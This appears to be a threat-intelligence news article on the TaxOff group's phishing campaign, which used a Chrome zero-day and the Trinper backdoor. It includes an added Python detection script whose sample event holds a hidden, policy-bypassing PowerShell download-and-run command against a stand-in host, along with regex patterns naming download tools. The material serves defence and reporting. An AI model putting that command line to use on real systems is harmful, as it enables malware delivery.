
In March 2025, cybersecurity experts at Positive Technologies uncovered a series of targeted attacks against Russian organizations, exploiting a previously unknown vulnerability in Google Chrome. Behind the operation stood the threat actor group known as TaxOff, which leveraged the CVE-2025-2783 exploit to deploy a powerful backdoor named Trinper. Although the vulnerability has since been patched, the incident underscored the grave risks posed by zero-day exploitation chains.
The infection chain began with a phishing email disguised as an invitation to the “Primakov Readings” forum. A single click on the embedded link triggered the exploit, culminating in the silent installation of the Trinper trojan. A similar tactic had been observed in October 2024, when malicious payloads were distributed through fake invitations to a Union State security conference.
Written in C++, Trinper employs multithreading to simultaneously collect system information, log keystrokes, and exfiltrate documents in formats such as .doc, .xls, .ppt, .rtf, and .pdf. The backdoor establishes persistent communication with a remote command-and-control (C2) server, from which it receives instructions ranging from shell command execution and reverse shell deployment to directory manipulation and self-deletion. Thanks to its concurrent design, Trinper maintains continuous data exchange, supports modular extension, and executes complex attack routines—all while remaining concealed.
The malware was deployed using tools such as Donut and Cobalt Strike. In one instance, the infection vector was a ZIP archive containing a Windows shortcut that launched a PowerShell script. This script downloaded a decoy document and initiated Trinper’s installation.
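As a defender's view of the ZIP → shortcut → PowerShell → decoy-download chain described above, the following is an added example (not code from Positive Technologies or from the article) that scores constructed, simplified process-creation events for that pattern. The event fields, paths, file names and URL are assumptions made for the example, not indicators from the campaign.

```python
import re

# Constructed, simplified process-creation events (Sysmon-like, not real telemetry):
# a PowerShell instance started by Explorer from a ZIP extraction folder, plus benign noise.
EVENTS = [
    {"pid": 5120, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cwd": r"C:\Users\alice\AppData\Local\Temp\Temp1_Invitation.zip",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iwr http://example.invalid/decoy.pdf "
                "-OutFile $env:TEMP\\decoy.pdf; Start-Process $env:TEMP\\decoy.pdf\""},
    {"pid": 5188, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cwd": r"C:\Users\alice", "cmdline": "powershell.exe -NoProfile -c Get-Process"},
    {"pid": 5200, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cwd": r"C:\Users\alice\Desktop", "cmdline": "notepad.exe notes.txt"},
]

# Download primitives commonly seen in one-line droppers.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|net\.webclient|"
    r"start-bitstransfer|\bcurl\b|\bwget\b", re.I)
# Evasion switches: hidden window, execution-policy bypass, encoded command.
HIDDEN_RE = re.compile(
    r"-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|-enc(odedcommand)?\b", re.I)
# Explorer extracts a double-clicked archive entry into %TEMP%\Temp1_<archive>.zip\ first.
ARCHIVE_CWD_RE = re.compile(r"\\Temp1_[^\\]+\.zip(\\|$)", re.I)


def score_event(ev):
    """Return (score, reasons) for one event; a score of 0 means nothing noteworthy."""
    reasons = []
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    if ev["parent"].lower().endswith("explorer.exe"):
        reasons.append("PowerShell launched directly by Explorer (shortcut/double-click)")
    if ARCHIVE_CWD_RE.search(ev["cwd"]):
        reasons.append("working directory is an Explorer ZIP extraction folder")
    if DOWNLOAD_RE.search(ev["cmdline"]):
        reasons.append("command line fetches remote content")
    if HIDDEN_RE.search(ev["cmdline"]):
        reasons.append("hidden window / policy bypass / encoded command")
    return len(reasons), reasons


def find_suspicious(events, threshold=3):
    """Return (pid, reasons) for events whose indicator count reaches the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in find_suspicious(EVENTS):
        print(pid, "; ".join(reasons))
```

The threshold keeps ordinary administrative PowerShell use (event 5188) out of the alert list; a single indicator alone is too noisy in most environments.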
According to Positive Technologies, behavioral analysis of the attack chain revealed notable similarities to campaigns attributed to another group—Team46. In fact, one month prior to the March incident, similar phishing emails were detected purporting to originate from Rostelecom, falsely announcing technical maintenance and containing ZIP files with PowerShell-launching shortcuts to deploy the same backdoor.
Another episode, detailed in September 2024 by Doctor Web, described an attack on a logistics company involving the exploitation of the CVE-2024-6473 zero-day flaw in Yandex Browser. The attack utilized DLL hijacking to replace legitimate system libraries and execute arbitrary code. The vulnerability was only addressed with the release of version 24.7.1.380 later that same month.
Experts conclude that TaxOff possesses a robust capability for executing sophisticated, long-term, and targeted cyber-espionage campaigns. Its use of zero-day exploits and bespoke malware highlights the group’s strategic intent to maintain persistent access within victim infrastructure. The group’s attack vectors, phishing lures, and malware delivery mechanisms all reflect a high degree of operational maturity and focus, with targets spanning from government entities to industrial enterprises.